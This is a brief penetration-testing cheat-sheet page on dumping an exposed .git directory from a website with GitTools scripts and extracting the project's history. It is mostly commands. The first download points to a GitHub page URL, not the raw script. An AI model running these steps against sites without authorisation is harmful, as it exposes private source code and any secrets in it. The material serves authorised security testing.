Exploit Notes

Dump Git Repository from Website

Last modified: 2023-03-12

Web

Dumping

GitTools downloads Git repository of the web application.
To dump the repository, execute the following commands.

wget https://github.com/internetwache/GitTools/blob/master/Dumper/gitdumper.sh
chmod +x gitdumper.sh
./gitdumper.sh https://example.com/.git/ ./example

We should get the git repository in local.
Then extract the entire project by executing the following.

wget https://raw.githubusercontent.com/internetwache/GitTools/master/Extractor/extractor.sh
chmod +x extractor.sh
./extractor.sh ./example ./new_example

Now we retrieve the entire git project from website.
It is stored in “./new_example” folder.
We can investigate the repository as follow.

cd new_example
git log --stat
git checkout <older_commit_id>

Tools by HDKS

Fuzzagotchi

Automatic web fuzzer.

aut0rec0n

Auto reconnaissance CLI.

Hash Cracker

Hash identifier.